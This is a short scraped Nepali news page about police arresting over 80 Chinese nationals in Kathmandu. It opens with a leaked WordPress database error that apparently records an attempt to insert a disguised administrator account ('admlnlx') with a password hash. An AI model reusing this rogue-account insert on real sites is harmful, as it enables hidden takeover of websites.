WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTYmvwcPVhZ1ax0rNZ9RUWWtO0jHzt.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 12:53:59', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, नेपाल प्रहरीले काठमाडौंको विभिन्न ठाउँबाट शंकास्पद गतिबिधिमा संलग्न ८० भन्दा बढी चिनियाँ नागरिकलाई पक्राउ गरेको छ ।
प्रहरीको केन्द्रीय अनुसन्धान ब्यूरोले महानगरीय प्रहरी परिसर काठमाडौं र महानगरीय प्रहरी कार्यालय रानीपोखरीसँगको संयुक्त अपरेसनमा मनमैजु, महाराजगञ्ज, बुढानीलकण्ठ लगायतका क्षेत्रबाट उनीहरुलाई नियन्त्रणमा लिएको हो ।
नियन्त्रणमा लिईएका चिनिया नागरिकलाई काठमाडौंको विभिन्न प्रहरी वृत्तमा राखी अनुसन्धान सुरु गरिएको सीआईबीका एसएसपी रामदत्त जोशीले जानकारी दिए ।